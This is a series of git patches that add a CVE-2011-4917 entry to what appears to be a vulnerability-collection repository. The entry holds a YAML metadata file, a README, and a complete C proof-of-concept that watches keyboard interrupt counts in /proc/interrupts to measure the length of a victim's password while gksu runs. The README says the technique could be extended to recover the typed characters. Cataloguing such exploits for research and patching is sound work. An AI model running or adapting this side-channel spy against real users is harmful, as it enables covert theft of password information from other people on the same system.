From 86246ec2b473e5fdd982d5e7bacbfbf5626eea94 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:51:10 +0000 Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 4102a21f7600dcb59e120c9f783ca1d39550d8c5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:53:36 +0000 Subject: [PATCH 2/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9d148ec1b4b904c8a95970025646b17d9fff714e Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:54:00 +0000 Subject: [PATCH 3/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/yaml/.keep diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e3b68afcf3ec96bed07b7ca2e9749274d85dd6c2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:54:09 +0000 Subject: [PATCH 4/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 70511cebd501e2a981159f2b47eb38a0fdb8be39 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:06 +0000 Subject: [PATCH 5/8] =?UTF-8?q?=E4=BF=AE=E6=94=B9POC=20=E6=B7=BB=E5=8A=A0P?= =?UTF-8?q?OC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 2 files changed, 178 insertions(+) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..bab4fad3 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 8935efc390c5b846d5b626a9cb73b923185a9d18 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:45 +0000 Subject: [PATCH 6/8] add cve/linux-kernel/2011/CVE-2011-4917/README.md. Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. +In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. + +The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. + +The limitations: + - it works on 2-core CPUs only. + - it works on 1-keyboard systems only. + - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). + - it doesn't carefully filter keystrokes after ENTER. + +run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu + +P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file -- Gitee From 6200b18e0f91efbc91f42f03935b80e9f5674271 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:57:24 +0000 Subject: [PATCH 7/8] rename cve/linux-kernel/2011/yaml/.keep to cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml. Signed-off-by: KunWang --- cve/linux-kernel/2011/yaml/.keep | 0 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 18 ++++++++++++++++++ 2 files changed, 18 insertions(+) delete mode 100644 cve/linux-kernel/2011/yaml/.keep create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml new file mode 100644 index 00000000..255ddd17 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml @@ -0,0 +1,18 @@ +id: CVE-2011-4917 +source: https://www.openwall.com/lists/oss-security/2011/11/07/9 +info: + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file -- Gitee From a6d1708bf4aa1d8881aadafcbf8ed5db5228eb5c Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:57:59 +0000 Subject: [PATCH 8/8] update other_list.yaml. Signed-off-by: KunWang --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index ede901d9..cf82c0bd 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -14,6 +14,7 @@ cve: - CVE-2020-27194 - CVE-2023-0179 - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: -- Gitee